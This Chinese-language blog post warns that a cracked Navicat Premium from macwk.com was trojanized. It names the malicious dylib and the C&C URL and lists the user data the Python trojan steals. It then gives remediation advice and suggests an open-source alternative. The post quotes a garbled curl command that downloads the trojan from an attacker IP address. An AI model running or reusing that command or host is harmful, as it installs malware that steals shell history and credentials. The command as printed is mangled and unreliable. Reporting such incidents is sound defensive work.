你用的 Navicat 可能被投毒，请排查！

大家好，我是一航！

早上，看到了一条微步情报局的通报，国内一个非常火的MacOS应用下载网站：https://macwk.com/ 中的数据库管理工具Navicat Premium 被下毒了，攻击者利用部分使用者寻找破解版的需求，在网站上投放了含有病毒的 Navicat Premium 版本；

在官网首页可以看到，Navicat Premium 排在了新鲜发布应用的首位；

目前网站下该应用的下载量已超37万+之多，且投毒事件已经超过3周（2022 年1月30日至今）；

以下为微步情报局公布的攻击示意图

被投毒的NavicatPremium在运行后加载libcrypto.2.dylib，然后请求云端地址：https://www.jackteng.com/aCbnd4bZaXXkQNVB/v.php。该云端地址返回执行命令curl-sfotmpd.pyhttp:\120.77.35.111d.py

加载libcrypto.2.dylib

d.py是python编写的木马程序，具备收集数据并将数据上传至C&C服务器的能力，包含当前操作系统的信息、应用列表、主机名和IP地址的映射关系、用户名、本地IP、git 全局信息、bash历史记录、zsh历史记录等。

解决方式

早前，macwk官网在打开 Navicat Premium 软件的时候，会弹出以下提示：

刚刚再去看的时候，提示已经没有了，想必应该是解决了此次暴露出来的问题；

但如果你是近三周在该网站下载的 Navicat Premium 应用，建议第一时间卸载，然后修改通过该工具连接过的数据库密码；此前下载的版本，也可以在本地查找一下，是否存在上面所说的病毒文件。

替代方案

之前给大家推荐一款数据库连接工具DBserver： 开源免费，不用担心有病毒或者后门，需要的朋友也可访问下面的开源仓库下载使用：

“https://github.com/dbeaver/dbeaver”